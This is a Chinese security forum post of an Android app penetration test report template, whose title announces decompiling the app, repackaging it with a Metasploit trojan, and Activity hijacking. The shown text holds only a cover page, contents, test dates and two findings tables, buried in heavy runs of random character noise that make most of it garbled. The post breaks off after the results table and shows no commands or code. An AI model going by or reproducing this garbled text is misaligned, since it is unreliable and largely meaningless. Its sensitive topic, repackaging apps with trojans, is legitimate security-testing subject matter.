找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4601|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
. E# D4 }( {4 m" m A P! S; o 9 c. C' [" D& L, Q$ o9 V8 a2 z

* a' x C$ H! l& H/ {$ o2 b 4 ^* J ~' M- y$ ?" E* w! R
9 {" n( `8 f' v) z5 y1 _/ P+ x 2 V; s& {, } j

' [; T0 h/ w" u; J4 D- j) d& O: r# H& e / p5 q y# y2 Z% r
- d/ M- Z6 L+ }/ U% |/ F/ S5 e& i9 W4 f+ \ j( G5 A2 F

7 i( u9 L: z# \" z9 B! A! J 1 R/ P' Y" e$ s+ K O 文档编号:                ! m% ]/ G' C# x 5 P, q, v3 t; C* Q) j

* D. x3 L% I2 v 2 N! E% `0 M3 l. h h8 R% |4 t; f7 v

! t6 e* W% M' A2 z + Q- c* f7 K* J1 N- c   ) X9 Q) Y6 V" U# K) h2 T) H1 N # Q4 A- P# U: F( L7 q/ _

N3 S; t1 B0 {" L 8 o2 c9 P$ _) n) _! h3 s9 m

h0 e: N' w) @. Z2 l3 @ V 8 }: M$ {' v; u6 |2 @ D$ `. Q4 k   . k! { j* j! ?' a 7 J, i# Y+ |, \, d

: f! _- D% N" a, R. Y $ V, a, f, s9 S3 U- I$ N

8 c" c. s9 g% q/ q ( g/ S j- D% d9 W6 u" k; h/ I   9 r8 }% v, n% u+ k' r8 ?* N- |. D, r9 r* M

* p: V1 ?% B* p/ `& J/ N ) h: {3 f4 ^, l. d

: M+ @: G9 ~! D" s0 I 1 W! ?! p a' a1 _! M% O; l3 [- c   \; l, K9 u" V! V( p: y 8 a, Q5 h% g: c

# Z" u$ r" o9 O& Z( a 8 j8 J( U" g' Y' L

+ }) ?/ g+ K7 o% C; q8 i+ e / ^/ O8 {" c& j* i$ q   1 s- Q/ t; l; N B, n 2 g) B- y- n1 |, a3 O; A5 c

( }5 s. i* \ @ 6 J( D W2 R6 D3 \ M2 U, H' r

( ~3 J! E/ |$ p5 N 0 T+ \% K( s5 t 某某某APP渗透测试 + s" {6 \8 j0 F/ n 7 o3 y* R0 N/ h: Q+ J* F( Y/ q

( z C) B. |/ T( X0 v+ N; C& a+ I; K( H ]0 I6 w1 |* `/ c

8 ^& r" ^. ^' z* r0 _6 ~ & A# U, W4 P6 O' G/ N4 ^8 T   2 l( V* x6 Z' K - Z+ ~( I2 F& u0 [

" y& y# c! |+ t , r3 j h% d" ]* E1 n: |: B; M0 C; G5 O; }

a" w8 L8 s3 a. A1 P" p* y" Y( i8 e8 N# @   " P5 Z% P$ D$ ^. Q( Q) @( ] 7 r2 @; p, o! @0 Q( c+ `" z, D7 Q4 G

' Q- O2 J9 ~ e7 }( E& U9 m0 [3 i: l

/ J. x2 T& I1 U. S" _* e$ o1 P 3 T7 r; L, c+ t# Z+ ?" y   / ~; f$ z* I. r% X0 G3 h " u# O! o0 |3 N b" K4 b+ }& a

% K. E# a, K/ W$ Z6 M* E ! N# Z. Q7 N+ W; B8 J2 C

# N* _, L7 H5 N$ s* a7 L3 B! n 0 ?- O' Z. J0 d6 I   ) Q' e1 u2 A- h8 f3 N7 _0 O' P + A1 ]& t: r) _& o( P

& d. l6 ?% I8 v$ r* r- n$ B* g5 C* l* o( `! c B

- R; F3 ^4 K6 b: X# }2 ]% G / c$ [3 O9 }: j1 C3 S2 ] 技 术 报 告 % q& l2 w; i8 z& `1 K8 q" u 4 Z# L o, \: m5 M: @

7 C5 T5 S5 @, f, e+ C9 M . w! w( t: [: b/ W

/ z1 D8 k# B1 C$ d, h( V' ]( ` ( V# f; c) d' |7 I/ |$ M   # P; S0 p( v' t5 h/ x! N# ?( a4 o: t% j; ?

* n: ?5 ]/ F, v 0 k. G% h: r( @# a/ v% \8 M2 B

, S/ G, z5 d9 } ~1 P. \/ u! F 8 N* X K+ R9 U* Y   - k% W6 l1 N& S6 c6 |% ~; ^ 5 ?+ |3 M$ \% }2 m$ x9 |

5 Q2 l7 p1 `# q 7 ]' u1 _- J" q+ ?; ? [

5 Q. ]5 N O# c. e ! P ^+ x, f: T/ d   - M0 ]% E4 T5 u& V0 S! x) h0 @7 `* k. s- w

% p* c3 z8 V1 m) t 5 }' v" v; u+ G% z+ f6 X% Z" L2 v

# w3 S3 D$ V$ t ~% M2 s3 {, ], p6 l8 W, R3 j   + w1 f* B R. h9 ~" m# g , b# Q9 F! g4 F6 q/ X' T( ^7 w

0 ^# A0 l: l6 i% U; j' i* J) f& f) y+ i7 N- p5 _7 h) C8 l

' A, v! Y2 K' P1 m, \, N, ~* W - z2 P8 D6 _9 Y0 N5 A" I- I% A   " c5 ^) @/ ]( W0 W 9 Q8 g+ Y' J$ H

( Y7 `7 T$ [; p* j 3 ^" G8 L* I: q2 [6 y( c

: J8 g1 S! i6 [+ Q1 t% y, C; K; { . B: m8 d4 H9 _( o   3 s; B; T8 V+ I- f3 X2 N 5 ^& }/ a* l( I6 y @3 i

" q, R- B3 u/ @# g* J1 Q* y $ H2 p _* l- c$ ^

, [- R9 h. X6 T1 V- t% X2 f) Y) {0 {% g1 S# }% R   3 ~, z8 L3 x! }7 }# } ) c# x2 G( u2 o) S) R

, a5 [' d0 w! N f ' X; ] ?% D) `8 G

0 |$ Q) R! w; K- p! e $ [- Y8 W3 h! G ]   $ ~" ~+ ^; c8 |4 r2 a. |% _ 9 c9 z0 b* j* d8 c* o

) N3 b. K& y" d5 ~/ ^ 1 E6 R$ k/ Y+ Z; a, z) N

9 f+ H: ^8 T# r4 g: r8 R3 j0 H1 U7 h$ w$ F5 G7 `) L   9 H M2 u ~& A+ v; I) g2 K7 }4 q ^4 O- _3 Q& f

! b+ \! E. x8 b2 c$ S7 @, d$ b ' y& \/ L5 D& J) l: E/ W3 I7 N

( l' y Z; t# f G! C9 R2 s A ' p! r9 w: L Q. X   / u+ g" V$ P8 S , w) ~0 R) c* V i6 m6 z

) C8 v2 r7 ]5 ^" Y0 n0 M ) e6 H9 u' `; L2 g) O

6 }* ^" F& k* @+ A2 G, X $ P( i/ V) L. [9 u   $ P! }) Y) ^0 [( S0 G4 |8 M( _+ p/ O& |4 i5 m. C& w

5 X) J3 L8 Y/ `; v# A : n3 C! N9 x9 K6 ~. f

7 [& X* o E- k, f* O7 k& Y4 O2 j! |. o9 F; F7 f" u   % h6 i1 T$ o. D" G 7 j7 r9 X1 y: p: S' _' G( i

* ?) |& x' t# l; |6 P6 s4 p, p7 C( s

+ e7 y8 S$ j! V1 A5 D$ s 1 t v. f: D: h+ g9 e+ s   . B3 F7 X. Q$ A4 H- G, n7 [ R + I+ R( X6 p: h( f7 e& Q

* q: f" Q6 O: {) ]! F 5 v# s, |' u0 a# f" w

+ z+ }6 g4 h+ h% B; f/ w) i! q ) M* S- V3 \: ]+ l9 Y+ B4 K   ' }' u- ?4 E& B, c, a+ v 0 U2 d4 j! M/ a R% f5 Q

, c8 i7 u7 l$ e4 M0 I8 }8 W Y. R! T, ~: j

3 ~. @0 I3 ~& P. O6 ?3 Z % v; M, G3 f- b8 R, z: Y   * y _& C; s$ |' H7 d6 O: N6 `& k) S# z/ |! d3 N1 e

' E1 Z- a7 [" E% m * {8 h X6 f/ r( j+ C7 x$ h

" M. R, Q/ v! u . I# y+ o$ ?5 ~   * _# g7 a1 _7 e& l+ k3 z$ I1 i . _+ f1 d. _/ `* f( d- Q+ n( [! a( i

& K* M# w' Z/ S, D: {; b# ^3 W 1 S- S3 N( Z9 E( d) `

2 W7 Y; H3 ]; I. z( R ) l6 K P2 o. b+ H6 k! q* E) _   ( d" |( t( q% `+ `% w & V* x3 O8 t9 ]$ j- r

. m& ]2 b' @) w* {% f4 R) f+ K# @9 r" t2 `

' K9 M9 o5 V2 k' b; R! |% C) c 8 |4 n, r6 e% x6 j% M& K   - t9 `& G* T- Q7 s' k4 e0 Z: L6 u

4 \' |$ T# G( w; D: e& T 0 b) W2 R8 v# U; f; w1 a1 Q1 c

' x: J* f; o& } 3 \7 k. ]- k$ t 二〇二〇年 5 l P; A" | p6 Q * M5 W4 ^+ M2 w9 o: O- Y' d4 A

9 G9 g0 X2 J& Q: f7 b/ ^3 c$ }6 o# {1 v) Q; ?- I; L- W+ V
* B, G* w; ?. d2 _ + w' q u# j2 o+ `
6 F: h8 c) u1 U) c ! B! Y! t* y2 w \5 a
6 Q4 E0 s2 Q! D, v5 O ; d8 R, V1 A8 r; n/ @, d
: ], w6 I8 ^# ^5 v) c N& f + c0 A( X9 d G U) k
" _) y( w; m, d0 j5 l5 N$ i 2 V6 N$ }0 G% Y# @, n4 `2 d( m, p
' H7 R; j: C2 x9 i1 v5 _ , ~- m! T d; J
6 C3 w6 N) o- N/ A* i) ^ ( Y% h* c- }: U1 n! O4 n: C. D
6 }) i, W% M8 J0 H, E. w+ @9 k , {0 I# G+ ]: S. U& ], L

6 h* j$ Z+ H+ Y & f. y* C6 @9 m* e 目 录 ( U. I3 ^1 |+ Y7 w3 V! q) Y1 i) M7 @+ T* ?

% E0 } V; v* f8 i |: M* L0 d/ p+ L 2 n5 d6 q) K% R3 b( x5 b x6 }+ |6 ?' I. R+ d% Z) ^2 P5 g

$ P! V% |/ |8 w7 |* ?! c3 }. t& K- @   6 ]; a! R. d A1 |. n# Y% z1 e7 c8 q/ g; {4 g% p2 }

, K- t; I* D8 R0 w7 {' T3 h6 G5 f( q9 V$ [/ }6 X+ n; n

p K4 r! v: \ # g/ C% j6 m9 w1 Y2 V 1 概述... 3 5 ]* b: [, \' {( Q% g% Z3 a) L& B! G: X/ _( w

9 q0 W% |& C! c3 f; Z& E { . \( `% H# i( @1 u! ?( h% N

5 [6 ?9 U+ V6 v 1 `& a. X8 |' T( n/ A. \' e0 x 1.2测试时间... 3 9 ?* g) s& q! ? 2 b. F. b5 j% B' s7 u% K+ ?

* l( g3 f4 R' ~% R& Y' ~ 8 @. _ E7 P' D1 Y4 {

: W8 l; x, }7 ~5 |/ b6 A / ~8 `% m) P, s- F6 r7 q 1.3测试对象... 3 8 U- V/ J. S7 ~" e 5 o! K% Y* x6 M2 L: v& H* l& l

4 C: S: @( N6 s, k0 C + C/ g" H2 X8 j! Y* W5 f) }

0 \$ t. `6 i9 }- a - J5 Y3 ^) Y L( ?6 k% P& y! M 1.4测试结果... 3 * @4 ^/ i/ J/ L# \( X8 ]8 z3 g, o0 q

% F: S! o0 F" _: N - B$ V k9 M& u3 f3 }- x

! ^$ Z' T+ p9 b5 a/ }4 @ 1 \$ I g- D# u3 B) ?! N9 y$ X 2 检测结果... 4 7 F( k) R, _1 C9 F 5 M) V( \' W' f! [5 f

, q2 Q2 }4 Z: f/ d , e2 ~# @, a/ e: j

0 h" F( {* y- m. l) v3 I" `( e1 N# v3 B4 O( v; I8 s 2.1 某某某... 4 6 n. ^6 Y& x0 n / F! y+ m {8 m) c

4 R! l, [& w# h $ A0 y+ f- W! J7 f* _

% e) U; q2 J# ]- Y 2 f, a+ s- }2 t0 [ 2.1.1检测目标... 4 ; | f" @3 U5 @; ` m/ B7 F & Y2 F/ {7 C/ X0 P, p8 I9 ~

) I: L: S5 s' e % V, c* v) q8 F ]

4 Z; d1 V1 j+ V5 } z 0 @$ c9 {$ _: |2 V7 j; K* b 2.1.2检测结果... 4 8 X( T3 w9 b$ A/ [9 x5 j # Y, X0 Y9 \! t( ~ X4 i+ q$ d

8 ]+ Z0 g/ s' _+ v# k& j) K; t$ i8 l) M

8 O9 v+ k) L; ?0 m0 f1 {) ]) K* b. T3 u# H* x0 v# n% \ 2.1.2.1. 4 1 w6 d4 H8 y# v- Y% ^ . d, }4 }+ i U6 z: r

4 b) c- u# D0 D5 J5 ^7 m3 N * n4 @: t( y: m- o+ `) b

) r5 b$ t8 c1 J7 S- e- M" e& { C# q5 L 2.1.2.2. 6 . ]$ B! P" q0 e; `1 |$ @ 4 z1 j5 s k. O2 M

; P( D+ T3 s- R& W/ W 8 I8 `2 i* j4 f8 f1 M% y9 p) x c

9 W- T' k2 b- p/ S8 \3 h+ ~( p- a3 O' B* P$ v8 d" e+ |' Z- t, X" C . q9 j; H/ @# Z7 `* X9 n# S; H9 e4 j- {8 X

e7 J, g' D I/ q0 \7 u7 g# c4 Q
# ~; ?' a$ d- v* q0 j }# W" c1 ? 8 p4 R ]! \! q2 E
, D$ g7 O7 G1 u 1 w+ e- M; Z. }! m3 F9 ^3 L
" @4 d$ o( T' M! Y " i9 P. d" \: j! g) S1 T% z
9 |9 Z% H" i/ ^% G- [3 G ; r# ]* Z/ [8 s$ ]

+ J, a+ j* o) ~0 i2 [, Z8 T$ o2 {, q 1 概述 ( a! U" b" `+ P7 B6 ` 7 d. F) ?0 y' y! t5 j! {

+ n# E: `8 q+ l k# x8 I* Z$ }' I9 Y3 _) P+ [& a

- h+ ?: X ]& [9 b. F7 t ^ 0 H& q: m7 ? O3 p% I) a) ?) B 1.2测试时间 $ e* K8 c' T2 y. V $ G4 h1 j$ X& C \5 r# N$ B) `

% w3 C! F9 \! C; M. P3 X R) g+ k0 i- G4 X! |0 q 8 v, \9 G; ?5 P' S4 |% F+ h+ H3 i2 o8 y# V% M2 H1 C- W; V6 V* T2 r+ S: o* h T8 W9 J! ]4 q! \+ r# |$ g0 x, ?# @. r9 l# z% w+ i( ?( V2 K7 O( G6 z7 M6 D( a' s: W, O7 D" I! Y+ x; e- S M1 c( |5 b8 A$ p0 C& G: @; H) d9 j6 j. |5 D. @1 ?5 A0 W' i7 x) F7 A4 z! }' S* s `2 S% z7 m7 o: j: y# R+ x; K+ r1 E4 j2 Y$ H! _' b0 ^/ {) ~6 Q0 q; y3 i, W8 G, w' K: R4 ]( @' x% I T Y* k$ ]$ a' w! @: D* ?& B' V% D+ F+ W" c1 R7 E9 k3 w8 D6 V4 }. {3 P- G! Y' _4 i- {7 p+ M! h* O9 Y& f! x! I* G. s& i' a# H1 g7 [" K% c* }3 K7 D9 X9 c" B, _8 U3 g4 U# a+ a }9 B+ E5 I3 g2 X ]( K n) G8 A* v6 j0 |2 I, l- I, Y7 X! u6 M* o8 ]# {/ g$ V% }" A1 ]4 Q e: p3 v! l o# O0 v! ]2 d6 r+ B/ d
T+ E* m- H8 y( ^% P4 z; d8 L. J

& e H5 w8 w. }- T8 Z9 @) } 9 K5 o$ L7 [3 f# U4 b7 A 渗透测试时间 " Q" Q X. u& s7 {' V& U+ l) R 7 M, ]& q! V* t" @" b& [$ A

+ O' Y) k* h( o" ~; m- U6 h. A- q2 t' G
% }* ?: A* A" }0 T" G1 } : M4 `0 u% W. ~

# G& m( O0 y' I/ {, c 0 J" w5 d/ e3 G% S" L 起始时间 - f, Z7 J# d- M! e N; ]5 [' z6 O/ |$ ` q5 w

& ~5 @# o/ ]' a $ [% u; ^- e) |' g9 C
- ?( x u$ n) T6 e; F& O8 Q 0 @/ k4 J5 @4 }- Q2 ~! a5 _7 t

8 ]8 p( C5 S$ X7 C: o( t! q" ~' q2 P; [. ?* [0 h" h 202046 I* {9 w# x( N$ E" m5 r5 ` ( }; c9 o. _* Y0 w& A

) n, u) {6 O& b3 }* @/ X; c . G4 b, B3 \) @7 O
- T+ H7 ]. E: r. [ . J2 t u. [- g; `3 E! j# T

; ?2 x! x: `8 [9 a3 a4 s . O: U* a& k2 m 结束时间 ! t/ [0 J* i+ W% Q! W; x$ V/ ?" V- X9 I/ s% B$ W1 R8 D. I# u

# a- |% W# z* I$ j8 m. A3 M! p / y4 X2 J9 g/ N3 f7 j& Y* J
+ e+ H S0 q( d 4 [2 ~' T$ M- z. p4 R; i

' u0 ^0 G, o3 z3 B( L3 y* ^ 6 Z. W" d6 F. y& r1 y 202049 % R( ]! Y: ~+ E2 t- w8 }1 L1 j3 A5 v $ I7 V0 C' q. I7 T" A

( b- C7 Z. k, g! S! i7 _: Z8 e! O ' B- W# f% R7 w# H, N; ~' O. Y
- `/ t. `1 S# I Z$ x9 O `* J" w1 g4 _

) }5 r+ K) ?1 A& e6 O6 i " s: w' f. ?1 @/ n) W) K 1.3测试对象 % W0 l b: f+ k6 @8 F 2 w6 c6 ~$ K! x0 r& L3 S3 {" w

" k. r" r8 R) P) a8 v 8 O5 h" a3 _2 Q2 d1 s1 y- S

+ c0 o/ Y* a# I ; \( @( p6 x! ?: B0 f) N* T8 J e 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 1 c( `) x, }7 g" e S3 W' ~' ?. e4 X+ U" O3 ~( A

$ A5 K7 ^) B( s - R6 p) n Y% m g: }

& |4 u' n7 v1 n! ` ) H3 L9 S& @5 l6 Z 1-1 检测对象 ( M) [3 r% D# D; U4 n/ h; e* L3 B0 l: z4 N+ V" h' m; |) L

4 V' b& F- h @& L" R' ]2 b4 }) p: {+ v) k9 {- e2 Q' P . p7 P' q; B. y0 H* e" a& P5 ^8 w/ i& u8 U6 y" ~1 { \1 b6 E3 w9 S1 K4 z' q" w, H1 Q/ {! C! k7 v. r1 p1 p* X3 Z; ]% b( H) w% |- ^' O. G0 N& [: l0 |( b# R6 v7 ^( j v4 b) l5 C' v& p7 w6 h# W9 V# I- X: ?. T& ^5 q, Q; w* B/ U. C2 ]+ r* ?" v- G, n8 X0 G' T. j2 K+ p: w0 p+ @* y2 c6 X6 z/ ^8 y, |: P$ i _- a* O( j* O# F2 Q* u* h' ]# e0 d# @9 I: p: m1 t" a8 j7 V8 a$ |. P4 {3 \1 t$ @( ^- j/ H/ _ R" M2 {0 D6 o6 X, y5 q6 r& k. h, T; _0 T, [* r! G/ o3 Q% u1 [( O$ }% h" j7 ], e: ?0 c9 R* ~6 @7 C2 |' J g4 E& H# ~8 f' w0 {, Q3 B2 s5 e: @2 ]' U1 C; U, a! M R8 I( \6 C s0 Z9 _5 b+ E A4 A% X: b$ H; ^0 l. B; A/ ^2 o- h j- F* o" E& R0 Y% u3 J6 g- ~' j: l' J. y+ M0 A! \) [; ~' J; j
0 c9 U2 Y4 c$ z3 t3 D- {: U: b3 Z; O/ w ]. x

5 b, l) t, \. w I/ l3 z 4 v3 ^! `- A0 v0 o5 o. x) G 序号 , ]7 N& D: J+ u. o- A 8 {. v, P0 V$ z% b7 T9 n5 M+ ?/ N

5 |- \& t/ t! C& @3 }5 z , z- i# Y( H p8 T4 L; k& s( F
( |* f: W# B9 j8 s4 s4 }5 T- s y/ D! ?, l1 g

+ }' l" E2 c4 i- O : r4 n/ ~, m4 B6 u 测试对象 & m( H2 [5 c7 T7 Z# o1 a7 z ( ~& z: j6 M8 y/ G

3 ^: J9 X3 u, e0 E3 F, R/ ^6 {$ Y9 H9 _* m2 e
- O( B: j Z8 D # y- `9 t2 G6 {& k6 E+ G, i

# N: u9 P8 G" i s/ ~& W$ X3 ^ H 测试地址 " [1 d5 `0 O3 w; H7 M: `2 h! p i5 ^% u$ R' q

' N$ j$ ]5 p) u8 O! { ; v7 S$ O* E# H/ R* M, Z7 c
& y0 ?) y- i4 I* q+ Q* Z3 B3 D( ^ ( G1 l; Q" A9 _3 K8 t/ A% s6 G5 ^

1 i+ z8 i r- g" \$ X0 B " i4 \) G; _# s7 u 安全漏洞 9 c& t$ j {/ a& {* S ^0 U g0 ^ {' `

' S8 n6 h5 n; T- P& E5 |+ v - C5 x( @: L0 z0 o/ l0 z
" h1 b! O5 Z$ V% q/ I0 H. R4 `/ _& I9 \& k9 d1 }& u! A# b1 K0 A

/ X# u& i3 }2 ]' p3 y - \/ }1 u# ]+ c; y- l4 W; c 1 ! [& J- b; Y; M6 |% I( T; s 4 R2 D( L5 R+ `

& r/ B8 k8 @' c4 k2 `' w: ~3 e; `0 U' W6 q3 E6 R0 U$ M% ]+ n
6 V, ~. Y/ v* X# J$ x9 C / N+ t' a, ?* I. b6 T9 F. i. q7 z

B; W( D5 ^: M ) u0 |( s) h- b3 F- ?0 @! u 某某某安卓APP 4 Q# ]3 c+ v% }0 ~$ m E5 Z 9 f' `9 L. c$ I6 P( v

. }1 c6 P* h0 C" q. w, |& c- H4 H9 Z3 @* c: n% ?
+ v7 f; `. n9 S, R9 {0 R 1 d- s2 A' R1 L+ n$ k7 F$ f

1 x D, B+ f6 \& a j) ~, U+ b5 ]- `# M/ {1 Y S1 D   . n' j% b" V, q. ^" D 9 G% w* t# z& Y1 [, v

& w, v3 @6 X- Y8 e' j 4 Z7 T- |2 \+ o* v
8 r* t0 [! U& J \8 J- O4 j4 Z; p, @/ [

N X: ` _% y) L4 ^* X1 W* G 2 3 ~9 {, H( Y# @1 a% I6 g( Y$ X) q. ^# |! C% u; N* J

5 {* }/ y3 h' p$ K% [8 T 7 b7 y, ?" @9 \$ ?% r1 k( H
! t' J3 h( B/ R4 ~/ ] 2 R- e6 }* x& u

" t h) y- p' [7 X 6 P8 v, B" O1 C2 B: k 1.4测试结果 ; [% D- Z1 j' A$ t0 W4 i2 X5 y" E& I' o) @4 d ?# ?1 o

* u# b9 {5 z- `6 @) X" A( G# S$ q: R0 K# k* W& y- H

; ]3 f: B1 e5 O 0 h" F" p2 S; |& P* ^* d" J5 T 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: % r* Q& D- ~; o3 J, n/ ~8 R 9 x. n4 Z4 C" ]2 p: y8 _

" M2 ^7 p. m/ N, t2 I * Z2 r3 k1 n1 a- A1 ?2 O

- A8 q! h, N2 x 6 D$ w( P( H; Q9 r: n$ C# b1 T   ; U- t Y8 e/ o9 Z- n 3 V6 Z" t6 S* f4 t& \6 ]- r

4 T. v3 w2 `: `) p% j- v ! H- u2 a. W+ Z! |
, y- w! Y% N7 k1 z5 ? X2 Z; X5 A0 y ?7 e 9 }$ V# c$ w' T4 S0 M! e( P" n' V* R3 r' T/ R/ {5 \; p. ]) o6 w: u# t0 m! Q* e4 E6 G0 a+ O% o6 x! S' W v# i( e$ k- D) A+ v! N% m* N! u, z6 B; k. t' b+ K$ D% ~: o5 h: G. b+ C- E! b6 D/ a7 U, k5 D5 q# s& O* X a& a& F8 ~" [) E* C+ Z( S2 Y, ?9 v6 @6 v8 y/ b- e9 _% v( e& c: u# o2 W* L. a( F* Y5 Q! d' ]2 o C& x A4 H) S4 v+ l# A. `# M/ l8 v. S4 e4 j2 ^0 S; _6 a8 b0 G! m4 @. `! X+ V' R+ B+ U1 {# R' B* k5 G9 Z+ t: V9 }! z8 p+ o% Z/ i. |8 H, b- l3 ]' w/ U3 x3 D& T' q# w1 k! t# _' \: g" T/ z8 }9 U$ ?: x h( ?' [* }4 @) x* v+ b* s+ x+ H- D z5 Z( H7 V& C. N) C# H0 T8 z8 c& w) [* ]; J7 }5 z- c6 L/ q0 V) W3 j& D0 I- D L: B5 X% T: ?7 S" c1 u$ s; C& Y3 w7 G. f! R) r8 D1 I0 b1 s2 e: D! W) C* M$ B+ c7 l. e( r5 P3 T* O( ]- ^2 t y& ^* C! N8 T, c; {: `' m+ r5 f7 L, I9 T+ `4 N5 H* B9 {; B7 n- J, a6 ?7 H. e: `) b/ x j# G! `% Q( ?- y# s! J% K' K, F9 D+ P" H6 o) f- a+ n& Y2 o! |0 |4 A* d' s8 [2 ~: u; ]" X) x0 L' L: B2 h% i7 h) T, C$ Q8 Y% i. ~( v1 q: r8 U3 k1 j0 Z1 p6 l+ I/ q1 }5 `& W, l4 i7 r1 b5 K, a" q$ n" d1 J9 c1 M% u# L8 g( z& y0 r1 z7 f: q. L: T: m! q8 U. |# D" _3 N" w8 P8 M: g6 s1 F: t$ K" H; O7 ]* k! B# p: V! M/ C# Y0 c/ G: z% C x% n, G7 T9 `
: M- s; K1 Q% A. d8 E% N" _ ' Q8 S- T2 D" S: I, y# t9 B

4 o: A6 E8 L8 j # c; [+ T0 P$ C 序号 3 Z6 w9 D) [( |% K! u 5 s- `. r q; \" s+ ]* i

. G1 y% t% T# x6 B1 W/ _, s ) Z! M/ B: q4 o( |/ m
9 V& x, |! ~6 V& p% [* e) _ , |% ~6 H9 Y) N& o- X& O8 ^' d D

5 R, W! R" U: E6 ^8 _9 C: I: Y ' a F6 ]6 p; p4 V1 C( ~% C/ j 系统名称 : @! E" g' I3 X1 |9 E6 U6 O. G. G$ Y' g

3 W9 W3 T" Q7 C1 r$ F/ C" x& y( ]7 p6 `$ ?" R8 _& C _2 x
9 ?! N2 c0 O7 E$ }: ~, i. j9 l ! A9 r$ ?2 O! L# h4 B. f6 j/ p% l

) }+ E; a, f! r/ o! t4 L ( A( ?9 A' c& k 漏洞名称 ' h+ a% h8 ]+ \. `* N ) |" ?# K, c& b& @3 w& N

( q) s6 V# u" U3 K9 b7 Z* u8 i9 p! n4 ?" }- `3 {* {% O4 o1 E
m, m7 M7 I5 o& a % I! T& F, F9 h v

, a7 z' f1 W2 n5 X" i, f8 P3 P, o $ O. d( o G' P! A5 u 漏洞危害 7 o3 n- w5 W* ] ) `+ h0 Q: U7 w$ D6 U) |" T: n8 ]

9 n2 v6 O: {$ Y% s8 P6 V& M ! O: x3 S0 m$ f0 n, M4 B) L4 \
# \) }4 c, E2 u 6 O( L- ~! [. C( \* K' [, k

& e1 B/ I" c2 `* w + f, ~4 u" x$ B) d0 |; \ 修复结果 & k0 s& o# G* Q5 r) H 7 f0 ?% ]+ z" |) d

' `( s6 s, W; [, X+ F: r% I- y. C: F- r* w5 t4 S6 U2 _5 C, R. ~/ V, `; V9 E
5 t6 \5 a# t7 y& w' n/ p9 f7 W; r: O3 g* m& c

. ~+ ^& z( [$ \ 2 D# n# K9 L& J/ H+ k) z! s 1 ' }$ D3 B; ~3 ]: D* x% n # L* u" Z! v% U# W _

; d1 F* m9 M- r/ e) g- u& D* ~ 6 x% B. {5 s+ e3 j% R9 B8 g4 E
6 i+ c$ M x; _! b2 j0 C 2 Z7 ?3 D: E4 W9 L

( r% |! _9 T4 B4 k0 H7 }( X {; d5 }9 I8 w9 L Q. F 某某某某某某APP 7 s- p( w. E% M( }6 U - q5 Q' @* a' z2 c: S

. O4 Q6 u/ K2 e- Y; s $ U$ C; P5 S- `
# r( s7 o0 i$ K+ k 4 E: c+ i/ b2 D0 b. g; K

( |8 I" G" J. M7 P. U S9 w 2 h1 ?* @( w2 k* g2 b7 S: E Activity 劫持 # z# L9 L8 X" z5 c# K( {6 p @; A4 p- ^

" k6 f. t; r9 L" o) ^$ M . D2 f8 `4 a' \, M! G

! K+ H4 x. ?/ J/ Y. C% H- h( x. o& b+ ^% X" \/ r1 x   u' O# B H8 w' E 5 }2 a9 z' f- h% K5 p5 g

' C9 f* C$ x$ [0 E8 ^0 p 7 G0 ^6 { w2 G/ v' X6 H( s
' v& r) R V" R! F% s( T 3 R: x- K+ x0 J

$ p& n; z8 n* ^" J5 Y9 g) g/ q% [* z* B+ w; o# v5 J. w8 i 3 h4 T# y6 _! j9 f' {* i' m" t% M: ~* ]

# [% x) B: u- o" A& G 6 N' a/ a0 \; N5 T6 J
8 H: Y! G! t J- s 4 j. U7 R, t* B: t3 o4 U7 ]" }" J( l

9 O6 \% W+ M- k7 }# M1 X! y - d/ l ~2 L; H7 L4 ?   8 k6 \3 v6 D/ K8 j 5 i' t8 [8 e: H9 U6 {( z4 }" G/ b

; `7 i: k1 s) t* O/ G3 C# ~3 _# N+ a- Z/ c/ ]* s7 l
( T- D1 o4 A+ f& S" V1 } 0 h5 b& a! B4 ?* a! e

& a' p; N- ]8 B. q$ k- M/ { . O/ a! h f$ l, G+ [1 C8 X 2 1 w2 ?0 X. f6 L9 _( g% V: p. J 9 a! r9 L) H& I7 K

9 {; A- S1 s" I2 h0 R& P2 {+ r# V6 }' S / I1 a( q4 k3 m7 d4 r8 L, D
0 C6 V9 a! h7 C, ?! G6 b1 o, S1 U, P1 A% a

, R% v1 E+ W, a, b & w! h: j/ L- s8 U 某某某某某某APP / g P) G) p; F7 l) v! e, ~$ [ F3 X {) n: @! Q9 P$ p

5 B) c0 P! _9 O( Y6 [1 I 3 U- Y4 _5 ], V( \
; }4 L3 O% ^1 Z 2 z9 `5 \' j C% z0 b/ t5 W, P

! L/ ^% P) B# N" p 6 b9 `( ~& @3 c/ ? 反编译二次打包捆绑木马、篡改APP代码 & l# o. D. t) m L 2 a7 R; `) _6 n0 s/ h! v

: {2 u2 K2 z5 v, b+ Z$ y4 B7 _ k 2 j% S7 @3 d H9 x& z4 L g5 `
: o; u* {3 U N5 e ! w& ] |8 S6 j7 R1 `) e/ m; a

' j+ x1 @" N8 z% A * J+ R+ @( Y6 w& X * `. I; t, q4 }6 }7 V6 d ; A/ ~2 ?) N1 m0 c! Y( q

7 [9 z/ ^# L4 o 3 p8 @' p3 a) W1 X8 b7 `) y
! {* ?4 @7 P, G: W' E. `4 R & A( a) m1 C5 G* I7 Z; q V

! Q" Y5 s5 g7 a5 z' W% h b) }& I. y/ z p6 f   1 y9 @ c6 n* O0 N' B h9 Z! R0 Z* R

% i/ V' [4 x! \3 W; a5 n" o( h1 ~$ ^! D5 T; M) N! S9 k5 y9 @" Y
% u( T6 P% p: K; j. s7 B4 r4 r8 ~! o: Y7 Z: P$ {8 `
& P9 N2 Z" \' r - J( P5 R) V& Y2 q

( N+ u9 B# b7 E, ^7 K: v K$ C1 N* C! U- @. B2 N3 v   8 u3 q* ?( A5 E# ^1 @ 1 e$ j8 J: v! j L0 C, `

! {# c: S% J& U) J7 r& g& a4 D; e$ }5 J% |$ @& N4 \

% Y) L* }, S, _1 C5 m& S5 R : C) d5 n. Z0 ^ 1-2 测试结果 N! ~9 a3 @' |" L! |7 S) S7 o1 |! y: o: ~

0 Y/ n2 V% H# w' J q; w6 t : m m, B$ y$ [- o

